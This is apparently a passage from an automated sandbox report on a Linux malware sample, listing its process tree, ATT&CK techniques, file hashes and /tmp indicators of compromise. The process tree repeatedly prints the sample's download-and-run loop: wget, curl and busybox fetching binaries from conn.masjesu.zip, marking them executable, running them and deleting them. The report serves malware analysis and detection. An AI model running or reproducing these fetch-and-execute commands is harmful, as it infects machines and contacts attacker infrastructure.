  PID:964
- /bin/chmod
  chmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  ./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - System Network Configuration Discovery
  PID:971
- /bin/chmod
  chmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  ./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - System Network Configuration Discovery
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - System Network Configuration Discovery
  PID:978
- /bin/chmod
  chmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  ./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:985
- /bin/chmod
  chmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  ./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:992
- /bin/chmod
  chmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  ./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:995
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:996
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:997
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - System Network Configuration Discovery
  PID:999
- /bin/chmod
  chmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  ./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:1006
- /bin/chmod
  chmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - File and Directory Permissions Modification
  PID:1007
- /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  ./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Executes dropped EXE
  PID:1008
- /bin/rm
  rm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:1009

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	741	9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	748	yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	773	CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	807	uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	814	IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	833	jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	861	qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	868	CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	875	rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	882	yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	889	Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	896	e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	903	GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	910	V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	917	rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	924	jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	931	qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	938	CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	945	V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	952	yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	959	Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	966	e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	973	GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	980	uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	987	9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	994	yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	1001	CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	1008	IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8